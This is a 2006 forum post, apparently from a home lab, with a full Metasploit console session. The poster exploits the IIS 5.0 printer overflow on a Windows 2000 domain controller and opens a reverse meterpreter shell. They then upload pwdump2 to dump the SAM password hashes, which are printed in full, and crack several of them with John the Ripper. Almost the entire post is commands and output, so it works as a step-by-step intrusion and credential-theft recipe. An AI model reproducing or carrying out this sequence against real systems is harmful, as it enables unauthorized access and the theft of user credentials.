Post Sun Jul 30, 2006 10:06 pm

Using MSF meterpreter to upload and use pwdump2 on a win2k DC

Here you go been fooling around with the metasploit meterpreter and used it to exploit a host, upload pwdump2, execute the program sucessfully to dump the SAM hases for the domain and then fire up john to crack the hashes. enjoy...

SegFault:~/framework-2.5 chrisgates$ ./msfconsole

__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|


+ -- --=[ msfconsole v2.5 [114 exploits - 74 payloads]

msf > use iis50_printer_overflow
msf iis50_printer_overflow > set PAYLOAD win32_reverse_meterpreter
PAYLOAD -> win32_reverse_meterpreter
msf iis50_printer_overflow(win32_reverse_meterpreter) > set RHOST 192.168.0.107
RHOST -> 192.168.0.107
msf iis50_printer_overflow(win32_reverse_meterpreter) > set LHOST 192.168.0.101
LHOST -> 192.168.0.101
msf iis50_printer_overflow(win32_reverse_meterpreter) > exploit
[*] Starting Reverse Handler.
[*] Trying Windows 2000 SP0/SP1 using return to esp at 0x732c45f3...
[*] Got connection from 192.168.0.101:4321 <-> 192.168.0.107:1631
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed
meterpreter>
[ -= connected to =- ]
[ -= meterpreter server =- ]
[ -= v. 00000500 =- ]
meterpreter> help

Core Core feature set commands
------------ ----------------
read Reads from a communication channel
write Writes to a communication channel
close Closes a communication channel
interact Switch to interactive mode with a channel
help Displays the list of all register commands
exit Exits the client
initcrypt Initializes the cryptographic subsystem

Extensions Feature extension commands
------------ ----------------
loadlib Loads a library on the remote endpoint
use Uses a feature extension module
meterpreter> use
Usage: use -m module1,module2,module3 [ -p path ] [ -d ]

-m <mod> The names of one or more modules to load (e.g. 'net').
-p <path> The path to load the modules from locally.
-d Load the library from disk, do not upload it.
meterpreter> use -m Fs
loadlib: Loading library from 'ext680723.dll' on the remote machine.
meterpreter>
loadlib: success.
meterpreter> help

Core Core feature set commands
------------ ----------------
read Reads from a communication channel
write Writes to a communication channel
close Closes a communication channel
interact Switch to interactive mode with a channel
help Displays the list of all register commands
exit Exits the client
initcrypt Initializes the cryptographic subsystem

Extensions Feature extension commands
------------ ----------------
loadlib Loads a library on the remote endpoint
use Uses a feature extension module

File System File system interaction and manipulation commands
------------ ----------------
cd Change working directory.
getcwd Get the current working directory.
ls List the contents of a directory.
upload Upload one or more files to a remote directory.
download Download one or more files from a remote directory.

meterpreter> upload /Users/chrisgates/framework-2.5/evil/PWDUMP2.EXE C:\
upload: Starting upload of '/Users/chrisgates/framework-2.5/evil/PWDUMP2.EXE' to 'C:\\PWDUMP2.EXE'...
upload: 1 uploads started.
meterpreter>
upload: Upload from '/Users/chrisgates/framework-2.5/evil/PWDUMP2.EXE' succeeded.
meterpreter> upload /Users/chrisgates/framework-2.5/evil/SAMDUMP.DLL C:\
upload: Starting upload of '/Users/chrisgates/framework-2.5/evil/SAMDUMP.DLL' to 'C:\\SAMDUMP.DLL'...
upload: 1 uploads started.
meterpreter>
upload: Upload from '/Users/chrisgates/framework-2.5/evil/SAMDUMP.DLL' succeeded.
meterpreter> execute -f cmd -c
execute: Executing 'cmd'...
meterpreter>
execute: success, process id is 2116.
execute: allocated channel 4 for new process.
meterpreter> interact 4
interact: Switching to interactive console on 4...
meterpreter>
interact: Started interactive channel 4.

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\>PWDUMP2
PWDUMP2
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f4d5c901afc6b10357012c647e1e3d7b:::
TsInternetUser:1000:747eb3a47d5c5997741c63e3b03d7af3:3600cc61d6a7732b46a82a8ba1ca98b2:::
NetShowServices:1001:00a1e1cd5cbee084f3e28a66a4b7c4b7:dc101f98eb6d8794771fcf7ce9906862:::
IUSR_LSO-HACKWINDOWS:1003:38925a13e93dfe7d3127babea64acab3:88c178bfaf976b026b3d36c01c11ca65:::
IWAM_LSO-HACKWINDOWS:1004:bed00505c344453b26d7329bcf953374:707983c77cff4606beb470e26122cf62:::
LSO:1111:743a025f7d3cfc4faad3b435b51404ee:bdf40214203c93099d9295c7d4595205:::
IME_USER:1112:4da9826b50892c5d00aa4eedb6ef32d3:b863209024a2f29f7f614cbb9ec4c8cd:::
IME_ADMIN:1113:4da9826b50892c5d00aa4eedb6ef32d3:b863209024a2f29f7f614cbb9ec4c8cd:::
testuser1:1115:0f20048efc645d0a179b4d5d6690bdf3:1120acb74670c7dd46f1d3f5038a5ce8:::
remote:1119:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
LSO-HACKWINDOWS$:1008:aad3b435b51404eeaad3b435b51404ee:872aa7a4b892bdb77dafec09c87fc7bb:::
TEST1$:1114:aad3b435b51404eeaad3b435b51404ee:aacd12d27c87cac8fc0b8538aed6f058:::

C:\>del PWDUMP2.EXE
del PWDUMP2.EXE
C:\PWDUMP2.EXE
Access is denied.

C:\>DEL SAMDUMP.DLL
DEL SAMDUMP.DLL

C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is A042-AC7F

Directory of C:\

12/22/2005 02:11p <DIR> ASFRoot
12/24/2005 08:07a 956 certreq.txt
12/22/2005 10:28p <DIR> Documents and Settings
12/22/2005 10:13p <DIR> Inetpub
01/02/2006 06:36a <DIR> Microsoft UAM Volume
01/02/2006 02:52a <DIR> Program Files
01/02/2006 12:45p 32,768 PWDUMP2.EXE
01/02/2006 07:11a <DIR> Share1
01/02/2006 07:11a <DIR> Share2
01/02/2006 05:09a <DIR> Share3
01/02/2006 02:50a <DIR> Snort
01/01/2006 05:30a <DIR> unzipped
01/01/2006 06:21a <DIR> WINNT
2 File(s) 33,724 bytes
11 Dir(s) 3,062,620,160 bytes free

C:\>exit
exit

interact: Ending interactive session.
meterpreter> getuid
meterpreter>
Username: IUSR_LSO-HACKWINDOWS
meterpreter> exit
exit
The meterpreter is shutting down...
[*] Meterpreter client finished.

[*] Exiting Reverse Handler.

SegFault:~ chrisgates$ cp /Users/chrisgates/framework-2.5/evil/LSO-DC-hash.rtf /Users/chrisgates/john-1.6.39/run/
SegFault:~ chrisgates$ cd john-1.6.39/run/
SegFault:~/john-1.6.39/run chrisgates$ john -i LSO-DC-hash.rtf
Loaded 17 passwords with no different salts (NT LM DES [24/32 4K])
TESTUSE (testuser1:1)
LSO (LSO:1)
R1 (testuser1:2)
PASSWOR (remote:1)
D (remote:2)

***I cut john off early, it wasnt a cracking exercise***